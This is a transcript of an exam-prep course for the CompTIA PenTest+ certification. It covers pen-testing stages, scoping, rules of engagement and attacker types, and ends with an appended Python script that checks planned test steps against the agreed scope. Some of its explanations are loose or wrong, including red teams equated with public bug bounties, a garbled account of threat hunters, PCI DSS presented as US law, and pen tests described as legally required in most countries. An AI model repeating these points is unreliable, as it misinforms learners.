CompTIA PenTest Full Course - FREE [11 Hours] PT0-002

149.04k views · 78,745 words
howtonetwork
A complete CompTIA PenTest+ course featuring theory and follow-along labs. 💻 cyber security tuto...
Video Transcript:
[Music] Thank you. Hello, welcome to this training course, which is a prep course for the CompTIA PenTest+ exam. This is probably an exam that is very different from other exams that you may have taken, so the goal of this initial video, this first video, is to present to you how this exam is structured and also the topics that will be covered and which you have to prepare for.

Now, as I mentioned, this is an exam that is probably different from other exams that you've taken. The reason for that is that the goal of this exam is to test whether you are prepared for real-world situations or not. So the idea here is to measure whether you are capable of actually performing a pen test in a real-world situation. It is different because there are many tests or exams that will measure whether you know a few tools or some commands or some concepts, for example involving a protocol, so very concept-based, very theoretical, whereas there are other exams that put you in a lab and ask you to perform a few tasks, and it doesn't matter how you perform those tasks as long as you achieve the ultimate goal, as long as you, for example, solve that problem.

The CompTIA PenTest+ exam is a bit different from that. You do need to know a bunch of concepts, but those concepts are supposed to be applied to a real-world situation following some standards, and this is the major challenge that you have in the CompTIA PenTest+ exam, because you have to not only be technically prepared but you also have to know a bunch of acronyms and a bunch of regulations, and usually they're based on United States regulations. So all these steps that you have to follow go along with a well-structured and strict sequence of steps. The idea of this course is to get you prepared to follow those strict steps and also get to know the tools, protocols, standards and patterns that you have to know in order to pass the exam.

So let's go through very briefly the major topics; each of these major topics can be broken down into many other subtopics, and we're going to discuss each of them as we go along the course. The first one is planning and scoping, which covers about 15 percent of the exam, and which in summary is being able to define what you are going to do and what you're not going to do. Then you have information gathering and vulnerability identification, which represents 22 percent of the exam; this is the step where you're going to collect information about your target. Then you have attacks and exploits, which represents 30 percent of the exam; this is where you actually deploy the attacks. You also have 17 percent of the exam associated with penetration testing tools, so you have to know a bunch of tools. And finally you have reporting and communication. The pen tester, and we're going to talk about this, is supposed to not only discover if there are vulnerabilities, for example, but also generate a report and communicate with the employer or the client about those issues and how to solve those issues. That represents 16 percent of the exam.

Now you have to keep in mind that the CompTIA PenTest+ exam requires you to know, or at least understand, what a bunch of tools do. You don't have to know how to use those tools in depth, but you have to know what they do, and it covers more than 50 different tools, and all these tools are listed on the CompTIA website. So as you can see, it is a very well-structured and strict exam; you have to follow their pattern, otherwise you won't be able to pass. What I mean by that, just to give an example: let's say that you know how to use Burp Suite, but, and that's not the case, let's say that the exam doesn't cover Burp Suite, and instead it requires you to know a different tool to analyze the HTTP protocol or to perform a bunch of attacks that you can do using Burp Suite. Well, if you know Burp Suite but you don't know the tool that CompTIA wants you to know, you're not going to score. So it's not only a matter of knowing how to solve a problem; you have to know how to solve a problem following what they expect you to do, performing the tasks that they expect you to do, which includes knowing the tools that they expect you to know. With that being said, that means that you have to practice, practice.

To make this exam even more difficult, it's not, as I previously mentioned, an exam where you'll be put in a lab and have to solve a problem. No, you're going to perform some simulated steps, so at some moments the exam will show you a situation that is simulating a real-world scenario. If you don't know how to solve it according to that specific, strict environment, you won't be able to answer that question. Just to give you another example, you have to know a tool called nmap, but not only know how to use nmap; you have to know a bunch of switches, or options, that you have available when using nmap. So you have to know those specific options.

Now, breaking those major topics into other subtopics, the CompTIA PenTest+ exam can be represented by these subtopics. The first one is reconnaissance, which is where you're going to make a recognition of the target environment. Then you have enumeration, where you try to get some more specific information about that environment, such as the operating systems that are running and the specific firmware versions and software versions that are running. Then you have the vulnerability scanning step, and credential attacks, where you're going to perform attacks in order to find out the combination of user and password. Then you're going to move to persistence, configuration compliance, and evasion, where the goal is to evade, or get past, without getting noticed. Then you have decompilation, then you have forensics and debugging. Keep in mind, once again, that we're going to go through each of these topics throughout the course, so there is no need to discuss these subtopics in depth at the moment. And finally, software assurance.

So keep in mind that you have to practice, practice, practice in order to be able to take the CompTIA PenTest+ exam, and all this training, all these labs that we're going to perform, try to do them as many times as you possibly can, obviously changing the environment a little bit, and do it again and again and again. This is the pattern that you have to follow in order to get ready for this exam, because of the, let's say, awkward or maybe odd type of environment that will be presented to you. Thank you very much.

Hello, welcome to our introduction to pen testing. The goal in this video today is to show you what the duties and requirements for a pen tester are. We have to understand what a pen tester does and what pen testing is about, and also understand that the CompTIA PenTest+ exam is structured based on regulations and standards, and we have to follow those standards as pen testers; that is a requirement. Without understanding that, you won't be able to pass the CompTIA PenTest+ exam.

So initially, before we actually discuss pen testing, we have to understand the difference between a cyber security defender, or let's say a security specialist, and a cyber security attacker, in general a hacker. First of all, if you studied cyber security, or information security more specifically, you know that information security is based on a triad called the CIA triad. CIA stands for confidentiality, integrity and availability. Just to remember, the idea of having this triad is to remind you that information security depends on guaranteeing confidentiality, which means that the information is supposed to be confidential: only the parties that are supposed to get access to a specific piece of information should have access to that specific information, not other parties. Whereas integrity means that the information should remain unaltered; the information cannot be changed unless it's the desire of the interested parties to change that information; other parties, third parties, cannot change that information or data. And also we have availability, which means that information should be available when necessary. Well, it doesn't help at all if you have a system that guarantees confidentiality and integrity but the system is not available, the information that is held by that system is not available. So that's the CIA triad.

On the other hand, hackers are trying to disclose that information; they're also trying to alter information, and maybe they're even trying to cause denial of access to that information. So as you can see, hackers are trying to implement the DAD triad, whereas information security tells you that you have to guarantee the CIA triad. Basically what the hackers are trying to do is to overcome those concepts.

Now, a pen tester, also called an ethical hacker or white hat, performs penetration tests. So basically what they are doing is testing a system, a network, an entire solution of a client or of its employer. The idea is to use techniques that hackers use in order to check whether that system can be compromised or not, whether there are vulnerabilities in that system, in that solution, in that network, in those devices, or not. So we have to keep in mind that the pen tester is not a hacker itself; it's a person that has the skill set that a hacker has, it's a person that can think as a hacker in order to find holes, find vulnerabilities, but the pen tester is not going to exploit those issues. For example, if the pen tester is capable of getting hold of information that he or she was not supposed to get, he's just going to let the employer or the client know that that vulnerability is there; that person is not going to sell that data, that information, to someone else. So as you can see, there are boundaries that limit a pen tester. The pen tester makes use of legal resources and techniques to search for vulnerabilities or weaknesses, which means that the company is not only fully aware, but there has been an agreement established between the parties. So the pen tester and a client, or the pen tester and the employer, actually wrote a contract; they came up with an agreement, and they have a contract that establishes what is supposed to be done and what cannot be done. So the boundaries are established by that contract.

Now it's also very important to know that the CompTIA PenTest+ exam will require you to know a bunch of acronyms, which include acronyms for types of contracts. So from time to time we're going to talk about SLA, we're going to talk about NDA, we're going to talk about SOW, and so many other types of documents that must be known if you want to take the CompTIA PenTest+ exam. Obviously there is a reason why they demand that: that's because, once again, this exam requires you to follow some standards, mostly defined by NIST.

So there is a contract involved; the pen testers are not hackers, although they can think like hackers and they have the same skill sets; and they must generate reports. That is the ultimate goal. Why? Because a company is actually hiring the pen tester in order to know if there are holes, and if there are holes, if there are vulnerabilities, the company wants to fix those holes. How can they know what holes or vulnerabilities are supposed to be fixed if the pen tester doesn't generate a report explaining what was found?

Also keep in mind: pen testers are not problem solvers. There is a very high probability that you're going to see in your CompTIA PenTest+ exam, in case you take it, questions regarding this specific bullet here. It's going to say something like "these are tasks to be performed by a pen tester", and you're going to see a bunch of options there; one of those options is going to be "solve problems when they are found". Nope, that's not the case. And we also have to keep in mind that pen testers are not threat hunters. Pen testers are not looking for specific threats; threat hunters are people that are looking for specific threats, specific vulnerabilities, because they're getting paid in order to do that. For example, let's say that Google is releasing a new product. They want to test their new product. Obviously they have their internal pen testers, but they also want to hire an external company, which they will do, but they also want to see if other people, not from that external company, are capable of finding some specific threats. So they're going to hire threat hunters; they're going to say, okay, we want you to see if you can find a threat in this specific module or in this specific software, in this specific solution. That's not the case of a pen tester. The pen tester is there in order to find vulnerabilities, or try to find vulnerabilities if they exist, in an entire solution, in an entire structure.

Now, why do companies hire pen testers? Well, first of all, as with everything else, to avoid or mitigate financial loss. Nowadays there is a wide range of cyber crimes, all flavors, different types, coming from all places; we can enumerate fraud, espionage, extortion, just to list a few, malware dissemination, intellectual property theft, unauthorized activity, software piracy and so many others. In this graph here we can see cyber crime annual revenues. This is from 2018, so considering that usually these statistical analyses are done every two years, every other year, this is a very recent graph. So as you can see here, this is how much people are making based on cyber crime; it's a whole bunch of money. So almost a trillion dollars being made out of illegal online markets, half a trillion being made based on trade secrets, so you can see here that you have probably almost two trillion dollars being made off cyber crime. This is a very lucrative environment or business.

This is the amount of monetary damage caused by cyber crime reported to the IC3 from 2001 to 2016. Now, only in 2016 the monetary loss caused by cyber crime was above a billion dollars; that is a lot of money for just one single year. So as you can see, this keeps increasing, growing and growing and growing. Obviously companies don't want that to keep happening; they want to mitigate their loss, so that's one of the reasons why they are hiring pen testers. Another reason is because the companies want to have a broader view of their infrastructure. So they don't want to simply find if there is an issue in a specific software, in a specific device, in a specific department, but they want to have a broader view of their entire infrastructure. Also, they want to fix a specific problem, which can be a single problem or multiple problems, but specific ones. They also want to implement complementary solutions to their existing solutions. They may also want to remediate problems that they may have, and here you must observe that there is a difference between fix and remediation. Fix is when you're still using that solution but fixing the problem; when you're remediating a problem, that means that you may change the solution that you have.

And most importantly, most companies have to. Now, obviously it depends on the country; each country has its own regulation or set of regulations, but in general most countries have regulations that demand that companies perform pen testing. So for example, in the United States we have regulations that determine that all companies that take payment by credit card or debit card, it doesn't matter, follow their regulations and their standards. For example, in the US we have the Payment Card Industry Data Security Standard, PCI DSS. Now, for example, they demand that companies that do take credit cards as payment, the companies that do credit card transactions or accept credit card transactions, perform annual external pen tests and annual internal pen tests. Now, not precisely in that order; usually what you're going to have is the annual internal pen test first, and then the annual external pen test, but that's not a determination, that's not a requirement. In case pen tests are performed and vulnerabilities are found, after those vulnerabilities are fixed, those holes are fixed, then you have to perform the pen test once again.

Now, what are the legal limits? As we know, laws change from country to country and even from state to state, so it is very, very important for pen testers to understand the regulations, the laws that are involved in the environment that person is within. They're in constant change; they must follow up, they must follow up, they must follow up. Now keep in mind, and we discussed this a few slides ago, but keep in mind: do not perform unauthorized access. What is unauthorized access? If the contract does not specifically say that the pen tester can go further than a specific limit, don't. If the contract doesn't explicitly say that, if the pen tester finds a hole, he or she can actually exploit that hole, can actually continue moving into that system, can continue breaking into that system, if the contract doesn't explicitly mention that, then don't. Unauthorized installation, unauthorized attacks, in general, unauthorized actions.

Now, what does it take in order to successfully perform pen tests? You have to get knowledge of the infrastructure. We are going to discuss, not now, the different types of boxes, black box, white box, gray box, the different types of access that are given to the pen tester by the employer or by the client, but it doesn't matter which one it is, the pen tester must get knowledge of the infrastructure. You must also get knowledge of the human resources, and usually this is done by performing social engineering. You must understand the laws, and obviously have technical skills, which can be enumerated here. First of all, understand operating systems; this is an area where becoming a pen tester requires some very deep, high-level understanding of operating systems, networking and programming. Also, creativity is critical, for example not only when using the tools that you have available but also, and most importantly, when performing social engineering. The pen tester must be very, very creative in order to extract information from employees. That is going to be one of the tasks that the pen tester will have to perform: try to extract information from human resources that belong to that company, to that specific client. Now, in order to extract that data or that information, creativity is fundamental, also social interaction, and knowing the tools that you have available.

Now, there are a bunch of tools, and as I previously mentioned, the CompTIA PenTest+ exam will require you to at least know what they do; it will require you to know approximately 50 different tools. Now, these tools can be classified by their objective. For example, we have the port scanners, we have sniffers. The port scanners will, in summary, try to see the services and protocols that are actually open and running in that network or device. The sniffers are used to collect data from the network. Vulnerability scanners will try to find vulnerabilities. The attacking tools will actually perform attacks; it can be a vulnerability attacking tool, it can be a credential cracking tool which will try to find the user and password. And, not a specific tool but an operating system, more specifically a Linux distribution called Kali Linux. There are different types of pen testing Linux distributions, but Kali Linux is the most well known; it's the major one, and it probably comes with more resources than the others.

Now, the CompTIA PenTest+ stages. You have to know how to follow these stages; these are the stages that the CompTIA PenTest+ exam requires you to understand and to follow when performing a pen test. They want you to follow these stages. One, planning and scoping: this is the stage where you're going to basically define the scope of your tests, what the boundaries are, what we want to find. Information gathering and vulnerability identification: in this stage the pen tester will try to gather information about that system, network, devices, for example how many devices there are, how the network is structured. Attacking and exploiting: this is the step where the pen tester will actually see if he or she can exploit, attack the system based on the information that's been gathered in the previous stage. And report and communicate those issues. Now, you also have another stage which is called enumeration. You could define enumeration as a stage between information gathering and attacking, although in general enumeration is listed as a subtopic of information gathering. Now, the reporting and communication stage is the stage where the pen tester will have to generate a report, presenting to the client the results found: did I find any vulnerability, did I find just informational problems, and also what is supposed to be done. So not only mention "okay, this is what I found", but also propose solutions. Keep in mind the pen tester will not execute solutions, but he or she will propose; it must be said in that report, "this is what you can do in order to fix those problems". It would not be helpful if the pen tester would only say "okay, I found some issues, here are the issues, now go find the solutions." That's not the case; the pen tester is also supposed to propose solutions.

So we discussed in this video what is required from a pen tester, what a pen tester is, and why companies actually hire pen testers, why pen testing is so important. Also we saw the stages that a pen tester is supposed to perform, or follow, when executing pen tests. Keep that information in mind; remember the difference between pen tester, hacker and threat hunter, and also these stages. Also keep in mind that companies are required to perform pen tests by law. See you in our next video. Thank you.

Hello, welcome to module 2 of our PenTest+ exam prep course. Here we're going to discuss some very important theories and concepts that are required in order to pass the CompTIA PenTest+ exam. These are very important concepts. As we mentioned in the previous module, it's very important for the CompTIA PenTest+ exam to demand from the students that they prove they not only know how to use tools but also how to prepare and plan for a pen test. It also requires from you some knowledge on legalities, on some laws and regulations. So that's going to be our focus in this module. This module will be focused on scoping and planning for engagement, and in order to do that we must know some regulations according to the location where you're at and also where your client is at; most importantly, usually you must know the regulations in your client's location.

So first of all, we have to understand some things regarding scoping and planning. Now, what is this about? Before a pen tester, or a white hat, starts a pen test, there are some steps that are required, as with anything else, right? So when it comes to pen testing, you must first prepare for that task or that set of tasks. Basically, you're gathering some information, trying to develop a plan, trying to gather some data before you actually do what you're supposed to do. Now, this involves a bunch of steps, and this is a more theoretical step, actually, because there is not a specific set of steps that must be taken before you actually execute a pen test. There is a broad set of steps that may be taken, and you may follow all those steps, or you may execute just a few of them. Basically it depends on what you're trying to do, it depends on the scenario, it depends on the reality of your client or your employer. So there is a bunch of variables here. That is why, in order to prepare for that pen test or those pen tests, you must scope, you must define a scope.

Basically, scoping is a step, or phase, where you're going to sit down with your client, for example, and there is a lot of metrics, parameters, constraints and limits that must be established. It's very, very important to know what you're stepping into; you have to know your limitations, you have to know your scope, what you can and what you cannot do, before you can actually plan for that execution, for that pen test.

Now, talking a little bit more about scoping. As I mentioned, the goal here is to determine a bunch of metrics. For example, you have to determine the why: why are you going to perform that pen test? And this is a question that must be answered by your client mostly, or your employer. The employer must know why that pen test is going to happen, why that client is actually hiring someone to execute a pen test. There is a plurality of reasons that may apply. Now, why is the why so important? Because basically this is going to define the scope of the pen test. Let's say that the client wants to make sure that a new system that just arrived is safe, is secure. Okay, so the scope is very limited; it's not the entire network, it's not all systems, all applications, all devices that are going to be pen tested; it's a specific system. So the scope must be well determined, and you can determine that by answering why the pen test is going to happen. And then you evolve.

Now it's important to realize that the pen tester doesn't have to answer these questions in this sequence; it may vary. Some questions may be answered, some questions may not be answered, so you don't have to determine all these questions here; maybe you have to determine more metrics. So it's very subjective, but what is important to understand here is that determining as many facts as you can is critical.

So for example, you also have to determine what to pen test. What are you going to pen test, what are you going to test, what are you going to try to hack? For example, just as I previously mentioned, just a specific system, a set of systems, the entire infrastructure? Are you going to try to pen test human resources as well? So it must be very precisely determined what to pen test. Now it's different from what to access, and sometimes this may be kind of confusing, because when you ask this question, what to access, you may think about, once again, systems and networks. Well, that as well, but not only that; you also have the physical environment. What are you going to try to access? Are you going to try to get physical access to that company? Maybe it's a large company that has a headquarters and also its branches; will you have access to those branches, will you have access to the headquarters? Maybe they won't give you access, but they will allow you to try to get access to those locations if you can manage to use social engineering, for example, and then get access to those locations. Also the networks: what are the networks that you are going to access, or try to access? Only their private network, the public network, the wireless Wi-Fi network? So not only physical but digital as well, but again, it must be precisely determined.

One good example here: let's say that you see that you could get access to a client's network, but to do that you have to first access a branch or another ISP, and then you can try to get access to the headquarters. Okay, but before you try to get access to one of those branches, to then get access to the headquarters, are you allowed to get access to this branch? Because if the contract determines, and we're going to discuss all those types of contracts and documents that must be signed and specified, but let's say that the contract just says, okay, the pen tester can try to get access, or can get access, to our headquarters; it doesn't mention the branches. Well, if you do get access to the branch before getting access to the headquarters, you may get in trouble; you may get prosecuted. It's very serious, and that is why scoping is such a critical step.

Now, you also have to determine, and usually this is once again determined by the client or the employer, whether it's a pen test that is being executed to adjust to some regulations. So basically, is it a compliance pen test or is it a business pen test? What's the difference? A business pen test is where the employer or the client wants to know: okay, for my own safety, my company's safety and my clients' safety, we want to make sure that our systems, networks and devices are safe, are not vulnerable, and if they are, we just want to fix them. It's more of an ideological thought; it's a concern between business and clients. Now, compliance is when the company is actually required to perform that pen test or those pen tests in order to be compliant with a specific regulation or some set of regulations. We are also going to discuss that soon enough, but just to give you a heads up, let's say that you have a health insurance company. A health insurance company has some critical data about its clients, for example Social Security numbers. So there is the so-called HIPAA, which is a set of regulations that define a bunch of things, including the type of security that must be guaranteed for the health insurance companies' clients. So the health insurance company must guarantee that, for example, its clients' Social Security numbers are secure, they are not going to go public, for example. So there is a set of regulations that determine what has to be done; health insurance companies must be compliant with HIPAA, for example.

And also, during the scoping phase, we're going to have the rules of engagement. Now, the rules of engagement are determined in the scoping phase, but they're very important for the planning phase as well. Now, what are the rules of engagement? Oh, and obviously you have to also determine to whom you're going to report. So it doesn't matter whether you're going to just write a final report or partial reports; you have to know to whom you are going to report, how many people, what do they do. You have to specifically know about those people. Why? Because, for example, you want to prevent giving information to someone that says, okay, I'm this person, for example, I'm a director, I'm the IT director, I'm the IT manager, or whatever the person says that he or she is, and then you give some private information that you're not supposed to give. So during the scoping phase you must be told by your employer or your client, you must ask this question: who are the people that I'm supposed to give information about the pen tests to? Who can I talk to? Who can I communicate with?

Now, before we discuss rules of engagement, we have to understand that there are some concepts that must be understood as well. First of all, the major types of assessment. The assessment is, well, what you're going to assess, right? So for example, you have the goals-based or objectives-based assessment; basically here it means that the pen test will be executed focusing on some well-determined objectives, well-determined goals. You can also, as previously mentioned, execute the compliance-based assessment, whether it's based on HIPAA or PCI DSS or any other; so the assessment could be compliance-based. Now, a different one that I haven't mentioned yet is the red team assessment. The red team assessment is very interesting, and you have to pay attention to this type of assessment here, mostly because, although it's common, you're also going to see many, many questions in your CompTIA PenTest+ exam regarding red teams. It's very common, so they really work on this type of assessment, and the reason is that the CompTIA PenTest+ exam is focused on real-world scenarios, and in a realistic scenario this is very common, as I mentioned.

Now, what is the red team assessment? It's basically an assessment where the client or the employer will hire a red team, it's called a red team, to actually perform attacks. So the goal of a red team is not to try to find failures, not to try to find vulnerabilities and then write a report to the client saying, okay, this is what we found, this is how you fix it. There is a big difference, and the difference is: when you have a goals-based or objectives-based assessment or a compliance-based assessment, it's critical that at the end of the assessment the pen tester writes a report, and in that report the pen tester must not only say, okay, this is what we found, but must also say this is how you fix it, or at least that's how I would fix it, I as a pen tester. In a red team assessment, that's not the case. Basically, we're hiring a team, usually it's a team, to try to find vulnerabilities. Now, it's also very common to see red teams when it comes to new software or new software versions. For example, a database: let's say that a specific database management system company, a company that designs database management systems, wants to show proof that their product is safe. So what do they do? They go public and say, hey, this is our new product, come in, try to find vulnerabilities, and if you do, well, in this case you get a prize. You tell us how you did it; you don't actually have to tell us how we can fix it, but you have to tell us what you did, okay, and based on that we're going to fix that problem and you're going to get some cash. Basically that's what it is. So that is a type of red team assessment, although it's public; that's not what is generally done, and that is not what the CompTIA PenTest+ exam is looking for, but it's a very similar idea. It's the
idea of hiring a team that will try to find vulnerabilities and let the client know when they do similarly we have what is called The Blue Team the blue team are the security Specialists those are the people that are trying to defend they're they're the ones that are deploying security measures and if the red team finds flaws vulnerabilities the blue team will try to fix those flaws now once the assessment has been defined you also have to determine with your client what kind of methodology is going to be used is it going to be a
white-box environment, a gray-box environment, or a black-box environment? Now, what's the difference? A white-box methodology, or a white-box environment, is an environment where the pen tester has access to infrastructure data or infrastructure information. For example, the client will tell you, the pen tester: okay, this is our public IP or public IPs, these are our domain names, that's our private network IP, these are the systems that we use, this is the number of devices that we have. They can even give you a diagram showing their topology, documentation describing what they have, and they can even give you credentials to access some systems, depending on the type of test that they want done. So this is the type of environment, or at least a pen testing environment, where you're going to have a bunch of information before you actually start pen testing.

Now you have quite the opposite of that methodology, and that's the black box, where you're given no info at all. In the worst-case scenario the company will simply say: okay, this is our company, that's our name, we're not even going to give you our website URL, we're not even going to give you our public IP address, you have to figure it out all by yourself. Okay, this is what we do, that's our name, and that's it; then you're going to have to find everything by yourself. So as you can see, this is a type of methodology that will take longer, because you're going to need to gather much, much more data, much more information, and obviously, since it's going to take longer, at least in theory this is the most expensive methodology. You also have the middle ground, the gray-box methodology, where you have a mix of white and black box: the client may give you some information and may hide some information from you. Again, in scoping this must be determined; there must be an agreement between the client and you, the pen tester.

Now, another question that must be answered. We have to have very clear in our mind that all this that we've been discussing here is done during the scoping phase, and the scoping phase must be performed between you as a pen tester and the client; nothing here is going to be determined by yourself and yourself only. Everything here must be an agreement between you and the client. Which leads us to the types of attackers. The type of attacker must be determined according to what the client wants to test. So let's say the client simply wants to answer: what if I want to see if my system is vulnerable to very simple attacking tools? Let's say that a kid, a 15-year-old kid, a 13-year-old kid, just to have fun or just out of curiosity wants to try to attack my system. Okay, so those are the script kiddies. Script kiddies are usually people that are using some pre-existing tools, so it's not a focused attack; they're just running those tools and trying those tools against a bunch of IPs. If it works, okay, that's a plus for them, but it's not a specific type of attack, which means that only very vulnerable systems
may be susceptible to it. So the type of information that the company wants to protect will be associated with the type of attacker, right? So for example, we've seen lately, and this is 2020, that Facebook and Google are losing some advertisement contracts, because these big companies are saying: okay, we're not going to advertise with these two companies specifically, Facebook and Google, we're not going to advertise with them anymore, because they are not taking precautions, they are not preventing some types of posts that are basically racist, prejudiced posts or political posts. These are called activists. Now there are some activists that have IT knowledge and use that IT knowledge to hack systems, so those are called hacktivists; basically hacktivists are hackers that only hack systems to make a, let's say, political stand. We also have the black hats and organized crime. Now, black hats and organized crime are not the same, they're not in the same bucket, but in the end they have the same goal, which is profit, financial profit, right? Black hats are people that are trying to steal information and sell that information, make some kind of gain, and we have organized crime, which many, many times may use black hats to execute the crimes that they're willing to execute. And we also have the advanced persistent threats. As you can see here, we see the word persistent: this type of attacker will not only gain access to a system or a network or a device, but will make sure that he or she will be able to get back. So, for example, some kind of Trojan horse will be installed, a backdoor that will guarantee that person can get back into that network; or maybe that attacker doesn't actually want to get back, but wants to install a Trojan horse that will keep sending data, keep sending information to that attacker. So it's going to install a backdoor, a Trojan horse, whatever it is, that will collect data and send it to that person. So there are different types of APTs, but what you have to understand here is that the APT is the most dangerous one, because this is a type of attacker that will guarantee that once the system is compromised it will remain compromised for a long time; at least that's the goal, maybe it's not successful, but that's the goal.

Now, again, why is it so important to know the types of attackers? Well, because the client must know what type of pen tester that company is going to hire, right? And obviously it will be associated with the type of attacks that the pen tester will perform. Well, if that attacker, I'm
sorry, if that pen tester will try to execute some specific attacks, look for some specific vulnerabilities, then the client must know what kind of professional it's looking for.

Now, as previously mentioned, the rules of engagement, or RoE, are also a critical step or phase in scoping and planning. Why? Because the rules of engagement will determine a bunch of stuff, and they must be as broad as possible. The rules of engagement are not a document themselves, but you do have a document (we'll see the types of documents that we have to know), and one of those documents or contracts must explicitly determine the rules of engagement, which means how this pen test is going to be executed. For example, how long is it going to take, for how long is it going to happen? So we need a timeline; obviously this timeline may not be as precise or as accurate as desired, but at least it must be as close to that perfection as possible. Also, the rules of engagement must describe what's included and also what's excluded, and you can see here excluded in red, because this is very, very important. Why is it so important? Well, included: what are the devices that the pen tester can try to attack, can try to find vulnerabilities in? What are the systems, what are the applications, what are the devices, what are the networks, what are the physical environments, the physical locations, what are the paths? But if the client wants to make sure that the pen tester doesn't do something specific, that must be described as well. Let's see an example. If the client is hiring the pen tester to pen test a new system that the company has just purchased, well, it must be very clear that the pen tester will not at any moment also try to get access to other systems; that pen tester will only try to get access to that system, unless the company also wants to answer the question: is it possible to get access to this new system if the attacker gets access to another system before reaching that newly purchased system? So this must be very well described if that's the case, where the company wants to allow the pen tester to get access to one system before getting access to the final product. Okay, so the rules of engagement must describe: okay, all of our systems are allowed to be pen tested; or let's say that the attacker cannot pen test that other system but they want to give access to the pen tester, so it's going to describe that the pen tester will get credentials to that specific system, and using those specific credentials the pen tester can jump into the newly purchased system. So there may be a bunch of constraints, a bunch of limitations, and that must be described in the rules of engagement.

Data: what to do with data before, during and after pen testing. So for example, before pen testing, is the client going to make any data available to the pen tester, yes or no? That must be asked; the pen tester must ask that of the client. What about during the pen test? The data that is going to be transmitted between
the pen tester, as an attacker, and the client's systems, networks and devices: how is it going to be transmitted? Is the pen tester going to just execute those attacks as a red teamer, or is it some kind of gray box where the pen tester will have a VPN connection to that network, and therefore the data that is being transmitted through that VPN must be encrypted, for example? So, during the transmission, what can happen? And after the pen test is done, once it's done, what to do with the data collected by the pen tester? Okay, so must the pen tester destroy that data, must the pen tester deliver a copy of all the data that was acquired? Once again, there are different situations, different possibilities, but it must be settled between the client and the pen tester.

Another rule of engagement to be established is what the active response is going to be from the client. Let's say that the pen tester tries to get access to a specific system; if there is a firewall and that firewall detects that attempt is happening, what is the firewall going to do? Is it going to block it? Is it going to identify the source, and if it comes from the pen tester, is the firewall going to allow that traffic? If that traffic is blocked, for how long will that client, in this case the pen tester, be blocked away from the system? So the action and reaction must be determined.

Are there resources required to successfully conduct the pen test? In case the pen tester needs any kind of resource to successfully execute the pen test, then the client must make those resources available. Now, successfully conducting the pen test doesn't mean that the client has to give enough data to the pen tester to make sure that the pen tester can actually find vulnerabilities or get access to the system or to the network; it's not to guarantee that the hacking activities will be successful, but the tasks of conducting the pen test.

The laws and regulations involved must be identified and determined. Now, this is something that usually, once again, involves the client, but it's the pen tester's responsibility to know or look into the laws and regulations that are involved. So if the pen tester has a client that resides in the US and in a specific state, let's say the state of New York, the pen tester must know the regulations involved in the tasks that are to be performed, the pen testing tasks. If that pen tester resides in, let's say, Australia, well, then we have a combination of two countries, and we may also have international laws, so the pen tester must be aware of that. But also there must be some regulations, at least internal regulations, determined by the client's company, so that is another situation to look into: ask the client what regulations they have, what limits they have, what policies they have regarding pen testing. A company may perfectly well determine some policies regarding, okay, when we run a pen test this is what may happen, this is what we allow, this is what we don't allow; so this must be determined and covered in the rules of engagement, and the pen tester must know the rules of engagement.

Also, another rule of engagement is the frequency of communication: how frequently is the pen tester going to communicate with those that he or she is supposed to communicate with? So for example, if the pen tester is running a pen test that will take only one or two days, most likely the communication will be done just once, once it's finished (well, obviously before the tasks are initiated too, but after that only at the end; that's the most common). But if the pen tests are taking longer, let's say a week, two weeks, a month, maybe even semesters or years, then the frequency must be determined: the frequency of communication, every week, every two weeks, every time a new vulnerability is found. It doesn't matter, as long as it's determined between the pen tester and the employer or client. And once again, the contacts, which means to whom the pen tester is communicating and from whom it's accepting requests or accepting information. We want to make sure that we as pen testers are not communicating with the wrong people. This is sensitive data;
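The rules of engagement items above (included and excluded assets, the timeline, the client's tolerance for downtime from active checks, and which contacts may receive information) can be turned into a pre-flight check that the tester runs before each step. This is an added example, not code from the course; the `RulesOfEngagement` fields, the `check_action` and `may_share_findings` helpers and the sample RoE values are all constructed for illustration.

```python
"""Pre-flight check of a planned pen-test step against the agreed rules of engagement.

Added illustration, not part of the course. The RoE fields, helper names and the
sample values are assumptions constructed for this example.
"""
from dataclasses import dataclass
from datetime import datetime
from ipaddress import ip_address, ip_network


@dataclass
class RulesOfEngagement:
    """The parts of an RoE that a script can check (field names are this example's own)."""
    included_networks: list    # subnets the client agreed may be tested
    excluded_hosts: list       # hosts explicitly carved out of the scope
    window_start: datetime     # agreed timeline for the engagement
    window_end: datetime
    intrusive_allowed: bool    # may active checks that can crash a host be run at all?
    max_downtime_minutes: int  # outage the client said it can tolerate
    contacts: list             # people the tester may exchange information with


def in_scope(roe, target):
    """True when target sits in an included network and is not an excluded host."""
    ip = ip_address(target)
    if any(ip == ip_address(host) for host in roe.excluded_hosts):
        return False
    return any(ip in ip_network(net) for net in roe.included_networks)


def check_action(roe, target, intrusive, when, expected_downtime_minutes=0):
    """Return every RoE rule a planned step would break; an empty list means go ahead.

    `when` is an ISO-8601 timestamp string, e.g. "2020-06-02T10:00".
    """
    problems = []
    if not in_scope(roe, target):
        # A reachable host is not the same as an approved host: stop and get written
        # agreement from the client before touching anything outside the scope.
        problems.append(f"{target} is outside the agreed scope")
    if not (roe.window_start <= datetime.fromisoformat(when) <= roe.window_end):
        problems.append("outside the agreed testing window")
    if intrusive and not roe.intrusive_allowed:
        problems.append("intrusive/active checks were not agreed")
    if intrusive and expected_downtime_minutes > roe.max_downtime_minutes:
        problems.append(
            f"possible downtime of {expected_downtime_minutes} min exceeds the agreed "
            f"{roe.max_downtime_minutes} min"
        )
    return problems


def may_share_findings(roe, requester):
    """Only the contacts named in the RoE receive results; anyone else, even someone
    claiming to be the IT director, is referred back to the primary contact."""
    return requester in roe.contacts


# Sample RoE, constructed for this example (addresses and names are fictitious).
SAMPLE_ROE = RulesOfEngagement(
    included_networks=["10.10.0.0/24", "10.10.1.0/24"],
    excluded_hosts=["10.10.0.5"],   # e.g. a production database the client carved out
    window_start=datetime.fromisoformat("2020-06-01T08:00"),
    window_end=datetime.fromisoformat("2020-06-05T18:00"),
    intrusive_allowed=True,
    max_downtime_minutes=10,
    contacts=["primary.contact@client.example"],
)


if __name__ == "__main__":
    # A routine step inside the agreed scope and window: no problems reported.
    print(check_action(SAMPLE_ROE, "10.10.1.77", intrusive=False, when="2020-06-02T10:00"))
    # A pivot into a subnet the agreement never mentioned, run after the window closed,
    # with an active check that could keep the host down for half an hour.
    for problem in check_action(SAMPLE_ROE, "10.10.2.1", intrusive=True,
                                when="2020-06-07T10:00", expected_downtime_minutes=30):
        print("STOP:", problem)
    print(may_share_findings(SAMPLE_ROE, "it.director@client.example"))
```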
